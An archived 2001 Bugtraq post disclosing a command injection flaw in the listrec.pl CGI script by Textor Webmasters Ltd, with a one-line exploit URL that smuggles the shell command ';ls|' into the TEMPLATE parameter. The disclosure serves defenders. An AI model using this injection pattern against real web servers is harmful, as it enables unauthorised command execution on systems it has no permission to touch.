Bugtraq mailing list archives
Textor Webmasters Ltd (listrec.pl)
From: Alexey Sintsov <don_huan () xakep ru>
Date: 12 Sep 2001 04:01:24 -0000
Last update (of listrec.pl) Jon Wright 11/11/1998. This script has vulnerability (does not filter input of the user) which allows to carry out commands from WebServer. EXPLOIT: www.server.com/cgi-bin/common/listrec.pl? APP=qmh-news&TEMPLATE=;ls| XP-TEAM
Current thread:
- Textor Webmasters Ltd (listrec.pl) Alexey Sintsov (Sep 11)